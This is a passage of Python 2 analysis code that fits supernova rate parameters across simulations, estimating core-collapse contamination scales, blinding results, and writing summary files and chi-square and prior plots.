kErr = RateTest.kErr, f_Js =RateTest.fJList, CCZbins = scaleZBins , scaleZBins = scaleZBins, Blind = Blind)\n else:\n CCIter.append(1.0)\n CCErrIter.append(0.0)\n RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, f_Js =RateTest.fJList, CCZbins = scaleZBins , scaleZBins = scaleZBins, Blind = Blind)\n\n if Blind:\n print \"Blinding b\"\n BetaIter.append(RateTest.Beta+ np.cos(cosVal))\n else:\n BetaIter.append(RateTest.Beta)\n BetaErrIter.append(RateTest.BetaErr)\n if not fixCCScale:\n if not noCCMC:\n CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname,Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)\n CCIter.append(CCScale)\n CCErrIter.append(CCScaleErr)\n else:\n CCIter.append(1.0)\n CCErrIter.append(0.0)\n \n print \"CCScale Progression\"\n print CCIter\n print \"CCScale Err Progression\"\n print CCErrIter\n if Rate_Model != 'discrete':\n print \"Beta Progression\"\n print BetaIter\n print \"Beta Err Progressions\"\n print BetaErrIter\n print \"Mean Betas\"\n print np.nanmean(BetaIter)\n\n print \"Mean CCScales\"\n print np.nanmean(CCIter)\n else:\n f_JStorage.append(RateTest.fJList)\n f_JErrStorage.append(RateTest.fJErrList)\n\n #print \"AAA CC Scales\"\n if not fixCCScale:\n\n if not noCCMC:\n CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)\n print CCScale\n CCScaleStorage.append(CCScale)\n CCScaleErrStorage.append(CCScaleErr)\n else:\n CCScaleStorage.append(0.0)\n CCScaleErrStorage.append(1.0)\n else:\n CCScaleStorage.append(1.0)\n CCScaleErrStorage.append(1.0)\n \n\n\n ks.append(RateTest.k)\n kErrs.append(RateTest.kErr)\n if Blind:\n print \"Blinding c\"\n Betas.append(RateTest.Beta+ np.cos(cosVal))\n\n else:\n Betas.append(RateTest.Beta)\n BetaErrs.append(RateTest.BetaErr)\n if Rate_Model == 'brokenpowerlawVar':\n zBreaks.append(Rate_Fitter.zBreak)\n zBreakErrs.append(Rate_Fitter.zBreakErr)\n\n Chi2s.append(RateTest.chi2)\n print \"CCScale Storage Iter {0}\".format(simInd)\n print CCScaleStorage\n if not noCCMC:\n print CCScale\n print CCScale[0]\n\n \n dnamestr = datadir.format(simInd)\n\n cutdnamestr = dnamestr.split('.')[0] + '+CUTS.FITRES.gz'\n #if saveCuts:\n # np.savetxt(cutdnamestr, RateTest.realcat.Catalog, delimiter = ' ', fmt='%s')\n\n lowzCut = zminFit\n highzCut = zmaxFit\n SampleSizes.append( RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)].shape[0])\n if saveCuts:\n np.savetxt(cutdnamestr, RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)], delimiter = ' ', fmt='%s')\n #with open(cutdnamestr, 'rb') as f_in:\n # with gzip.open(cutdnamestr + '.gz', 'wb') as f_out:\n # shutil.copyfileobj(f_in, f_out)\n except Exception, e:\n print \"FAILURE\"\n print e\n traceback.print_exc()\n nFail +=1\n else:\n try:\n\n RateTest = Rate_Fitter(datadir.format(simInd), dataname.format(simInd), simdir, simname,simgenfile, trueMCBeta, trueMCK, zminSamp =zminSamp, zmaxSamp =zmaxSamp, zminFit =zminFit, zmaxFit =zmaxFit, cheatZ = cheatZ, cheatType = cheatType, cuts = cuts, cheatCCSub = cheatCCSub, cheatCCScale = cheatCCScale, Rate_Model = Rate_Model, MURESCuts = MURESCuts, noCCMC = noCCMC, priorRate = priorRate, priorZEff = priorZEff, ratePriorErrUp = ratePriorErrUp, ratePriorErrDown =ratePriorErrDown, ratePriorErrAll = ratePriorErrAll)# , MJDMin = 0, MJDMax = np.inf)\n \n if ZSysFlag:\n RateTest.zSystematic(nbins = nbins, binList = binList)\n simLoaded = True\n\n RateTest.effCalc(nbinsSamp = nbinsSamp,nbinsFit = nbinsFit, fracContamCut = fcc)\n #RateTest.effCalc(nbins = 20)\n BetaIter = []\n BetaErrIter = []\n CCIter = []\n CCErrIter = []\n\n if redoScaleZBinFlag:\n\n RealCat = RateTest.postCutRealCat \n RealOutlierCat = RealCat[(RealCat['MURES'] > muresBinsHigh)| (RealCat['MURES'] < muresBinsLow)]\n\n zArray =RealOutlierCat[RateTest.ztype]\n zArray.sort()\n\n print 'zArray'\n print zArray\n print 'nScaleZBins'\n print nScaleZBins\n\n splitZs = np.array_split(zArray, nScaleZBins)\n\n #[(0[0], (0[-1] + 1[0]), (1[-1] + 2[0]), 2[1]]\n\n scaleZBins = [splitZs[0][0]]\n\n \n for i in range(1,nScaleZBins):\n\n scaleZBins.append((splitZs[i-1][-1] + splitZs[i][0] )/2.0)\n scaleZBins.append(splitZs[i][-1])\n\n\n RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, simInd =simInd, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, TrueCCScale = TrueCCScale, scaleZBins = scaleZBins, Blind = Blind)\n if Rate_Model != 'discrete':\n if Blind:\n print \"Blinding d\"\n BetaIter.append(RateTest.Beta+ np.cos(cosVal))\n else:\n BetaIter.append(RateTest.Beta)\n BetaErrIter.append(RateTest.BetaErr)\n for iteration in range(nIter):\n print \"interation Number\"\n print iteration\n if not fixCCScale:\n if not noCCMC:\n CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)\n CCIter.append(CCScale)\n CCErrIter.append(CCScaleErr)\n RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = CCScale, CCScaleErr = CCScaleErr, TrueCCScale = TrueCCScale, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, CCZbins = scaleZBins, scaleZBins = scaleZBins, Blind = Blind)\n else:\n CCIter.append(0.0)\n CCErrIter.append(1.0)\n\n RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 0.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, CCZbins = scaleZBins, scaleZBins = scaleZBins, Blind = Blind)\n else:\n CCIter.append(1.0)\n CCErrIter.append(1.0)\n RateTest.fit_rate(fixK = fixK, fixBeta = fixBeta, trueBeta = trueBeta - trueMCBeta, CCScale = 1.0, CCScaleErr = 1.0, TrueCCScale = 0.0, BetaInit = RateTest.Beta, kInit = RateTest.k, BetaErr = RateTest.BetaErr, kErr = RateTest.kErr, CCZbins = scaleZBins, scaleZBins = scaleZBins, Blind = Blind)\n\n \n if Rate_Model != 'discrete':\n if Blind:\n print \"Blinding e\"\n BetaIter.append(RateTest.Beta+ np.cos(cosVal))\n else:\n BetaIter.append(RateTest.Beta)\n BetaErrIter.append(RateTest.BetaErr)\n if not fixCCScale:\n if not noCCMC:\n CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, Rate_Model = Rate_Model, f_Js =RateTest.fJList, simInd = simInd, debug = debug, ztype = RateTest.ztype)\n CCIter.append(CCScale)\n CCErrIter.append(CCScaleErr)\n if Rate_Model != 'discrete':\n print \"Beta Progression\"\n print BetaIter\n print \"Beta Err Progressions\"\n print BetaErrIter\n \n print \"Mean Betas\"\n print np.nanmean(BetaIter)\n\n else:\n f_JStorage.append(RateTest.fJList)\n f_JErrStorage.append(RateTest.fJErrList)\n \n print \"CCScale Progression\"\n print CCIter\n print \"CCScale Err Progression\"\n print CCErrIter\n print \"Mean CCScales\"\n print np.nanmean(CCIter)\n if not fixCCScale:\n if not noCCMC:\n print \"AAA CC Scales\"\n \n CCScale, CCScaleErr = getCCScale(RateTest.postCutSimCat, RateTest.postCutRealCat, MURESWindow = (ScaleMuResCutLow, ScaleMuResCutHigh), zbins = scaleZBins, Beta = RateTest.Beta, binList = RateTest.binListFit, fracCCData = RateTest.fracCCData, outfilePrefix = dataname, f_Js =RateTest.fJList, Rate_Model = Rate_Model, simInd = simInd, debug = debug, ztype = RateTest.ztype)\n print 'CC Scale'\n print CCScale\n CCScaleStorage.append(CCScale)\n CCScaleErrStorage.append(CCScaleErr)\n else: \n CCScaleStorage.append(0.0)\n CCScaleErrStorage.append(1.0)\n else:\n CCScaleStorage.append(1.0)\n CCScaleErrStorage.append(1.0)\n\n dnamestr = datadir.format(simInd)\n\n cutdnamestr = dnamestr.split('.')[0] + '+CUTS.FITRES.gz'\n\n np.savetxt(cutdnamestr, RateTest.realcat.Catalog, delimiter = ' ', fmt='%s')\n\n #with open(cutdnamestr, 'rb') as f_in:\n # with gzip.open(cutdnamestr + '.gz', 'wb') as f_out:\n # shutil.copyfileobj(f_in, f_out)\n\n\n\n cutsnamestr = simname.split('.')[0] + '+CUTS.FITRES.gz'\n\n np.savetxt(cutsnamestr, RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)], delimiter = ' ', fmt = '%s')\n\n lowzCut = zminFit\n highzCut = zmaxFit\n SampleSizes.append( RateTest.realcat.Catalog[(RateTest.realcat.Catalog[RateTest.ztype] < zmaxFit) & (RateTest.realcat.Catalog[RateTest.ztype] > zminFit)].shape[0])\n\n #with open(cutsnamestr, 'rb') as f_in:\n # with gzip.open(cutsnamestr + '.gz', 'wb') as f_out:\n # shutil.copyfileobj(f_in, f_out)\n\n\n ks.append(RateTest.k)\n kErrs.append(RateTest.kErr)\n if Rate_Model != 'discrete':\n if Blind:\n print \"Blinding f\"\n Betas.append(RateTest.Beta+ np.cos(cosVal))\n else:\n Betas.append(RateTest.Beta)\n BetaErrs.append(RateTest.BetaErr)\n\n if Rate_Model == 'brokenpowerlawVar':\n zBreaks.append(Rate_Fitter.zBreak)\n zBreakErrs.append(Rate_Fitter.zBreakErr)\n\n Chi2s.append(RateTest.chi2)\n print \"CCScale Storage Iter {0}\".format(simInd)\n print CCScaleStorage\n if not noCCMC:\n print CCScale\n print CCScale[0]\n if Rate_Model != 'discrete':\n if np.isnan(RateTest.Beta):\n nFail +=1\n\n except Exception, e:\n print \"FAILURE\"\n print e\n traceback.print_exc()\n nFail +=1\n #if Blind:\n # Betas = np.array(Betas) + np.cos(47392945716038.134971247)\n print \"Number of Failures\"\n print nFail\n if Rate_Model != 'discrete':\n\n badSims = np.invert(np.isfinite(Betas) & (BetaErrs > 0) & np.isfinite(ks) & (kErrs > 0))\n mBetas = ma.masked_array(Betas, mask=badSims)\n mBetaErrs = ma.masked_array(BetaErrs, mask=badSims)\n mks = ma.masked_array(ks, mask=badSims)\n mkErrs = ma.masked_array(kErrs, mask=badSims)\n print \"mean k\"\n print np.nanmean(ks)\n print \"mean kerrs\"\n print np.nanmean(kErrs)\n print \"std. k\"\n print np.nanstd(ks)\n print \"Mean beta\"\n print np.nanmean(Betas)\n print \"Mean betaerrs\"\n print np.nanmean(BetaErrs)\n print \"std. beta\"\n print np.nanstd(Betas)\n if len(Betas) == 1:\n kmean.append(ks[0])\n ksigma.append(0.0)\n kErr.append(kErrs[0])\n BetaMean.append(Betas[0])\n BetaSigma.append(0.0)\n BetaErr.append(BetaErrs[0])\n else:\n print \"test here\"\n print ks\n print mks\n print Betas\n print mBetas\n print 'end test here'\n kmean.append(np.average(mks, weights = 1.0/mkErrs**2))\n ksigma.append(np.std(mks))\n kErr.append(np.mean(mkErrs))\n BetaMean.append(np.average(mBetas, weights = 1.0/mBetaErrs**2))\n #BetaWeightMean.append(np.average(Betas, weights = 1.0/ma.masked_invalid(BetaErrs)**2))\n #KWeightMean.append(np.average(ks, weights = 1.0/ma.masked_invalid(kErrs)**2))\n BetaSigma.append(np.std(mBetas))\n BetaErr.append(np.mean(mBetaErrs))\n else:\n print \"mean f_Js\"\n print np.nanmean(f_JStorage, axis =0)\n print \"mean f_JErrs\"\n print np.nanmean(f_JErrStorage, axis =0)\n if Rate_Model == 'brokenpowerlawVar':\n zBreakMeans.append(np.nanmean(zBreaks))\n zBreakSigmas.append(np.nanstd(zBreaks))\n\n Chi2Mean.append(np.nanmean(Chi2s))\n Chi2Sigma.append(np.nanstd(Chi2s))\n\n \n\n \n #if simInd == 1:\n print \"Indiv Chi2s\"\n print Chi2s\n bins0 = np.linspace(1.0, 20.0, 10)\n hist, bins = np.histogram(Chi2s, bins = bins0)\n xs = (bins[1:] + bins[:-1])/2.0\n plt.bar(xs, hist, width = bins[1:] - bins[:-1])\n\n print \"Chi2 Hist\"\n print bins\n print hist\n\n chi2s = scipy.stats.chi2.pdf(xs, nbinsFit - 2)\n\n norm = np.max(hist)*1.0/np.max(chi2s)\n\n\n plt.plot(xs, chi2s*norm, color = 'g')\n if cheatType and not cheatZ:\n plt.savefig(dataname +'Chi2Plot_CheatType.png')\n elif cheatZ and not cheatType:\n plt.savefig(dataname +'Chi2Plot_CheatZ.png')\n elif cheatZ and cheatType:\n plt.savefig(dataname +'Chi2Plot_CheatTypeZ.png')\n else:\n plt.savefig(dataname +'Chi2Plot.png')\n\n if not noCCMC:\n print \"AAA CC Scale means (weighted, unweighted)\"\n #print np.average(ma.masked_invalid(np.array(CCScaleStorage)),weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2, axis = 0)\n #print np.nanmean(ma.masked_invalid(np.array(CCScaleStorage)), axis = 0)\n #print CCScaleStorage\n #print CCScaleErrStorage\n print np.average(np.array(CCScaleStorage),weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2, axis = 0)\n print np.nanmean(np.array(CCScaleStorage), axis = 0)\n print \"AAA CC Scale stds\"\n print np.nanstd(np.array(CCScaleStorage), axis = 0)\n CCScaleStorageGlobal.append(CCScaleStorage)\n\n \n\n print \"All Betas\"\n print Betas\n\n if cheatType:\n print \"THESE RESULTS ONLY INCLUDE TRUE Ias BECAUSE WE CHEATED AND USED THE SIM INFORMATION\"\n if cheatZ:\n print \"THESE RESULTS Use Simulated Redshift info\"\n '''\n print \"lengths of lists\"\n\n print len(RateTest.globalNDataStorage)\n print len(RateTest.globalChi2Storage)\n print len(RateTest.globalZPhotBinStorage)\n print len(RateTest.globalNDataIaPhotBinStorage)\n plt.clf()\n plt.scatter(RateTest.globalNDataStorage, RateTest.globalChi2Storage)\n plt.xlabel('nData')\n plt.ylabel('chi2 in bin')\n string = ''\n if cheatType: string += 'CheatType'\n if cheatZ: string += 'CheatZ'\n print 'string here'\n print string\n plt.savefig(RateTest.realName + 'Chi2VsnData' + string +'.png')\n plt.clf()\n\n\n plt.scatter(RateTest.globalZPhotBinStorage, RateTest.globalChi2Storage)\n plt.xlabel('zPhot bin center')\n plt.ylabel('chi2 in bin')\n plt.savefig(RateTest.realName + 'Chi2VsZPhot' + string +'.png')\n plt.clf()\n\n plt.clf()\n plt.scatter(RateTest.globalZPhotBinStorage, RateTest.globalNDataIaPhotBinStorage, s = 1, c = 'r', label = 'Type Ia Data, zPhot')\n plt.scatter(RateTest.globalZPhotBinStorage, RateTest.globalNDataCCPhotBinStorage, s = 1, c = 'b', label = 'CC Data, zPhot')\n plt.scatter(RateTest.globalZTrueBinStorage, RateTest.globalNDataIaTrueBinStorage, s = 1, c = 'Pink', label = 'Type Ia Data, zTrue')\n plt.scatter(RateTest.globalZTrueBinStorage, RateTest.globalNDataCCTrueBinStorage, s = 1, c = 'Cyan', label = 'CC Data, zTrue')\n plt.yscale('log')\n plt.xlabel('redshift either true or phot')\n plt.legend()\n plt.savefig(RateTest.realName + 'AggregateZDistro' + string +'.png')\n\n '''\n #print \"MURES CUTS\"\n #print MURES_Cuts\n print \"Frac Contam Cuts\"\n print fracContamCuts\n if Rate_Model != 'discrete':\n print \"Kmeans\"\n print kmean\n print \"Ksigmas\"\n print ksigma\n print \"BetaMeans\"\n print BetaMean\n print \"BetaSigmas\"\n print BetaSigma\n print \"BetaErrs\"\n print BetaErr\n else: \n print \"f_J mean unweighted\"\n print np.mean(f_JStorage, axis = 0)\n print \"f_J mean weighted\"\n print np.average(f_JStorage, weights = 1.0/(np.array(f_JErrStorage))**2, axis = 0)\n\n print \"f_J Errors\"\n print np.mean(f_JErrStorage, axis = 0)\n\n if Rate_Model == 'brokenpowerlawVar':\n print \"mean powerlaw break z\"\n print zBreakMeans\n print \"st. dev powerlaw break z\"\n print zBreakSigmas\n print \"Chi2Means\"\n print Chi2Mean\n print \"Chi2Sigma\"\n print Chi2Sigma\n\n assert(fracContamCuts[0] == -1)\n outfile = dataname\n if Rate_Model != 'discrete':\n print \"outfile Pre Prefix\"\n print outfile\n\n if cheatType:\n outfile = outfile + '_CheatType'\n if cheatZ:\n outfile = outfile + 'Z'\n elif cheatZ:\n outfile = outfile + '_CheatZ'\n\n outfile1 = outfile + '.txt'\n outfile2 = outfile + '-IndivBetaK.txt'\n output2 = open(outfile2, 'w')\n output2.write('i Beta_i k_i BetaErr_i kErr_i\\n')\n for i, b, k, berr, kerr in zip(range(len(Betas)),Betas, ks, BetaErrs, kErrs):\n output2.write('{0} {1:.4f} {2:.4f} {3:.4f} {4:.4f}\\n'.format(i, b, k, berr, kerr))\n output2.close()\n print \"Outfile Name\"\n if not(os.path.isfile(outfile1)):\n output = open(outfile1, 'w')\n output.write('#Date Date/time at which job finished\\n')\n output.write('#DataBeta Input beta for the simulated data sample. Will be 0.0 for real data.\\n')\n output.write('#N_sims Number of datalike sims that go into the subsequent means\\n')\n output.write('#SampleSize Mean Number of Events in data post cut\\n')\n output.write('#delta_Beta mean difference between large MC sim beta (2.11 for the time being) and the measured beta for the data (not the beta in column 2.\\n')\n output.write('#sigma_Beta stdev of delta_Beta over N_sims sims\\n')\n output.write('#BetaStdErr std. error in the mean of delta_Beta over N_sims sims\\n')\n output.write('#Beta_err mean statistical error on beta\\n')\n output.write('#K mean ratio between large MC sim K (1.7E-5 for the time being) and the measured K for the data \\n')\n output.write('#sigma_K stdev of K over N_sims sims\\n')\n output.write('#KStdErr std. error in the mean of K over N_sims sims\\n')\n output.write('#KStaterr mean statistical error on K\\n')\n output.write('#meanZ mean photoZ of the large MC sim\\n')\n output.write('#sigmaZ std. deviation of the photoZs for the large Sim\\n')\n output.write('#sigmaDZ std. deviation of (zSim - zPHOT)\\n')\n output.write('#NCC/NTotScaled overall CC Contamination after adjusting CC Frac to data\\n')\n output.write('#NCC/NTot overall CC Contamination in sim only\\n')\n output.write('#CCScales relative sim vs. CC rate in z-bins \\n')\n output.write('#TypeChoice Internal Diagnostic, check code comments\\n')\n output.write('#NNProbCut Threshold for NN probability of Ia\\n')\n output.write('#NBins Number of Analysis Bins\\n')\n output.write('#MRSLow Threshold for Neg Mures Outliers\\n')\n output.write('#MRSHigh Threshold for Pos Mures Outliers\\n')\n output.write('#FitprobCut Lowest Fitprob in sim\\n')\n output.write('#MRSCut NSigma Hubble residual cut\\n')\n output.write('#Chi2 minimum value of Chi2 function\\n')\n output.write('#Correlation cov[0,1]/np.sqrt(cov[0,0]*cov[1,1])\\n')\n output.write('#Date \\t\\tDataBeta N_sims SampleSize delta_Beta sigma_Beta BetaStdErr BetaStatErr K sigma_K KStdErr KStatErr meanZ sigmaZ sigmaDz NCC/NTotScaled NCC/NTot CCScales TypeChoice NNProbCut NBins MRSLow MRSHigh FitprobCut MRSCut Chi2 Correlation\\n')\n else:\n output = open(outfile1, 'a')\n print 'outfile'\n print outfile\n\n\n\n cat = RateTest.simcat.Catalog\n t = time.strftime('%b-%d-%H:%M')\n N_Sims = np.sum(np.invert(np.isnan(ks)))\n SigBeta = float(BetaSigma[0])\n SigK = float(ksigma[0])\n kStdErr = float(ksigma[0])/np.sqrt(N_Sims)\n BetaStdErr = float(BetaSigma[0])/np.sqrt(N_Sims)\n meanZ = np.nanmean(cat[RateTest.ztype])\n sigZ = np.nanstd(cat[RateTest.ztype])\n sigDZ = np.nanstd(cat[RateTest.ztype] - cat['SIM_ZCMB'])\n lowzCut = zminFit\n highzCut = zmaxFit\n contam2 = np.sum(cat[(cat[RateTest.ztype] > lowzCut) & (cat[RateTest.ztype] < highzCut)]['SIM_TYPE_INDEX'] !=1).astype(float)/ float(cat[(cat[RateTest.ztype] > lowzCut) & (cat[RateTest.ztype] < highzCut)].shape[0])\n contam = RateTest.fracCCDataTot\n ccscales = np.average(np.array(CCScaleStorage),weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2, axis = 0)\n cov = RateTest.covar\n correlation = cov[0, 1] / np.sqrt(cov[0, 0] * cov[1, 1])\n print \"Outfile debug\"\n print t\n print trueBeta\n print N_Sims\n print BetaMean[0]\n print BetaStdErr\n print BetaErrs[0]\n print meanZ\n print sigZ\n print sigDZ\n print contam\n print RateTest.typeString\n print RateTest.postCutSimCat['NN_PROB_IA'].min()\n print SigBeta\n print kmean[0]\n print kErrs[0]\n print kStdErr\n print SigK\n print np.nanmean(SampleSizes)\n print int(nbinsFit)\n print ScaleMuResCutLow\n print ScaleMuResCutHigh\n print RateTest.postCutSimCat['FITPROB'].min()\n print MURESCuts\n print np.mean(Chi2Mean)\n print contam2\n print ccscales\n print correlation\n ccscales = ','.join(str(ccscales).split())\n output.write('{0}\\t\\t{1:.2f}\\t{2}\\t{17:.3f}\\t{3:.3f}\\t{12:.3f}\\t{4:.3f}\\t{5:.3f}\\t{13:.3f}\\t{14:.3f}\\t{15:.3f}\\t{16:.3f}\\t{6:.3f}\\t{7:.3f}\\t{8:.3f}\\t{9:.3f}\\t{24:.3f}\\t{25}\\t{10}\\t{11:.3f}\\t{18:d}\\t{19:.3f}\\t{20:.3f}\\t{21:.3f}\\t{22:.2f}\\t{23:.3f}\\t{26:.3f}\\n'.format(t, trueBeta, N_Sims, BetaMean[0], BetaStdErr, BetaErrs[0],meanZ, sigZ, sigDZ, contam, RateTest.typeString, RateTest.postCutSimCat['NN_PROB_IA'].min(), SigBeta, kmean[0], kErrs[0], kStdErr, SigK, np.nanmean(SampleSizes), int(nbinsFit), ScaleMuResCutLow, ScaleMuResCutHigh, RateTest.postCutSimCat['FITPROB'].min(), MURESCuts, np.mean(Chi2Mean), contam2, ccscales, correlation) )\n print \"BetaMean[0]\"\n print BetaMean[0]\n print BetaMean\n print \"KMean[0]\"\n print kmean[0]\n print kmean\n print \"Correlation\"\n\n print correlation\n #print \"BetaWeightMean[0]\"\n #print BetaWeightMean[0]\n #print BetaWeightMean\n #print \"KWeightMean[0]\"\n #print KWeightMean[0]\n #print KWeightMean\n if not noCCMC:\n print \"Individual Scales\"\n print CCScaleStorage\n print \"Individual ScaleErrs\"\n print CCScaleErrStorage\n print \"average ScaleErrs\"\n print np.nanmean(CCScaleErrStorage)\n print \"AAA CC Scale means (weighted, unweighted)2\"\n print np.average(ma.masked_invalid(np.array(CCScaleStorage)), weights = 1.0/ma.masked_invalid(CCScaleErrStorage)**2)\n print np.nanmean(ma.masked_invalid(np.array(CCScaleStorage)))\n\n print \"AAA CC Scale stds\"\n print np.nanstd(np.array(CCScaleStorage))\n if simInd == 1:\n plt.clf()\n hist, bins = np.histogram(CCScaleStorage, bins = np.linspace(0.0, 5.0, 10))\n plt.step((bins[1:]+bins[:-1])/2.0, hist, where = 'mid', c = 'g')\n plt.savefig(dataname + 'ScaleDistro.png')\n plt.clf()\n\n\n print \"nIter\"\n print nIter\n if not (priorRate is None):\n kPriorPlots = np.linspace(0.8, 1.5, 300)\n kPriors = []\n for ktemp in kPriorPlots:\n kPriors.append(ratePrior(ktemp*trueMCK, BetaMean[0]*trueMCBeta, priorRate, priorZEff, priorRateErrUp = ratePriorErrUp, priorRateErrDown = ratePriorErrDown, priorRateErrAll = ratePriorErrAll))\n\n\n betaPriorPlots = np.linspace(-0.5, 0.5, 300)\n betaPriors = []\n for btemp in betaPriorPlots:\n betaPriors.append(ratePrior(kmean[0]*trueMCK, b*trueMCBeta, priorRate, priorZEff, priorRateErrUp = ratePriorErrUp, priorRateErrDown = ratePriorErrDown, priorRateErrAll = ratePriorErrAll))\n\n actualPrior = ratePrior(kmean[0]*trueMCK, BetaMean[0]*trueMCBeta, priorRate, priorZEff, priorRateErrUp = ratePriorErrUp, priorRateErrDown = ratePriorErrDown, priorRateErrAll = ratePriorErrAll)\n\n\n kPriors = np.array(kPriors)\n betaPriors = np.array(betaPriors)\n\n plt.clf()\n plt.figure()\n \n plt.plot(kPriorPlots, np.log10(kPriors) )\n plt.hlines(np.log10(actualPrior), kPriorPlots[0], kPriorPlots[-1], label = 'Best Fit Prior = {0:.03f}'.format(actualPrior))\n plt.vlines(kmean[0], np.log10(kPriors).min(), np.log10(kPriors).max(), label = 'Best Fit K = {0:.03f}'.format(kmean[0]))\n plt.xlabel('k')\n plt.ylabel('ratePrior')\n plt.legend()\n plt.savefig(dataname + '_LogKPriorPlot.png')\n\n \n\n plt.clf()\n plt.figure()\n plt.plot(kPriorPlots, kPriors)\n plt.hlines(actualPrior, kPriorPlots[0], kPriorPlots[-1], label = 'Best Fit Prior = {0:.03f}'.format(actualPrior))\n plt.vlines(kmean[0], kPriors.min(), kPriors.max(), label = 'Best Fit K = {0:.03f}'.format(kmean[0]))\n plt.xlabel('k')\n plt.ylabel('ratePrior')\n plt.legend()\n plt.savefig(dataname + '_KPriorPlot.png')\n\n plt.clf()\n plt.figure()\n plt.plot(betaPriorPlots, betaPriors)\n plt.hlines(actualPrior, betaPriorPlots[0], betaPriorPlots[-1], label = 'Best Fit Prior = {0:.03f}'.format(actualPrior))\n plt.vlines(BetaMean[0], betaPriors.min(), betaPriors.max(), label = 'Best Fit Beta = {0:.03f}'.format(BetaMean[0]))\n plt.xlabel('beta')\n plt.ylabel('ratePrior')\n plt.legend()\n plt.savefig(dataname + '_BetaPriorPlot.png')\n\n '''\n argList = ''\n minObjList = ''\n chi2Initargs = ''\n for i in xrange(zCenters.shape[0]):\n argList += 'f{0},'.format(i)\n minObjList += 'f{0} = 1.0, error_f{0} = 0.1, limit_f{0} = (0.0, None),'.format(i)\n chi2Initargs += '1.0,'\n argList = argList[:-1]\n minObjList = minObjList[:-1]\n chi2Initargs = chi2Initargs[:-1]\n #print argList\n #print minObjList\n #print chi2Initargs\n\n exec('''\n '''\n def chi2func(nData, nSim, effmat, fnorm, zCenters, {0}, dump = False, complexdump = False):\n\n Chi2Temp = 0.0\n f_Js = [{0}]\n chi2Mat = np.zeros((self.nbins))\n adjNMC = np.zeros((self.nbins))\n #print f_Js\n #Check if I am scaling errors down with increasing MC size. Make MC twice as large as \"Data\" to test.\n for row, nDataI, i in zip(effmat, nData, xrange(self.nbins)):\n #if dump:\n # print \"nDataI\"\n # print nDataI\n JSumTemp = 0.0\n for eff, nSimJ, f_J, j in zip(row, nSim, f_Js, xrange(self.nbins)):\n JSumTemp += nSimJ*f_J*eff*fnorm\n if dump and i == j:\n print \"nDataI\"\n print nDataI\n print \"Bin Contribution to scaled nSim\"\n print nSimJ*f_J*eff*fnorm\n #print \"Product of nSimJ, f_J, eff, fnorm\"\n #print nSimJ\n #print f_J\n #print eff\n #print fnorm\n if nDataI > 1E-11 or JSumTemp > 1E-11:\n if dump and i == j:\n print \"nDataI\"\n print nDataI\n print \"scaled nSim\"\n print JSumTemp\n print \"fnorm\"\n print fnorm\n print \"error\"\n print nDataI + JSumTemp*fnorm\n if (nDataI + JSumTemp*fnorm) <= 0:\n print (nDataI + JSumTemp*fnorm)\n assert(0)\n Chi2Temp += ((nDataI - JSumTemp)**2/(nDataI + JSumTemp*fnorm))#*fnorm**2\n\n return Chi2Temp\n ''''''.format(argList), locals())\n fnorm = float(np.sum(nData))/float(self.simcat.Catalog['zPHOT'].shape[0])\n\n #print type(chi2func)\n #print 'lamChi2 = lambda {0}: chi2func(nData, nSim, self.effmat, fnorm, zCenters, {0})'.format(argList)\n exec('lamChi2 = lambda {0}: chi2func(nData, nSim, self.effmat, fnorm, zCenters, {0})'.format(argList),locals())\n exec('lamChi2Dump = lambda {0}: chi2func(nData, nSim, self.effmat, fnorm, zCenters, {0}, dump = True)'.format(argList),locals())\n #print type(lamChi2)\n #print type(lamChi2Dump)\n #print 'MinObj = M(lamChi2, {0})'.format(minObjList)\n exec('MinObj = M(lamChi2, {0})'.format(minObjList),locals())\n exec('chi2Init = lamChi2Dump({0})'.format(chi2Initargs),locals())\n #print \"Chi2 init = {0}\".format(round(chi2Init, 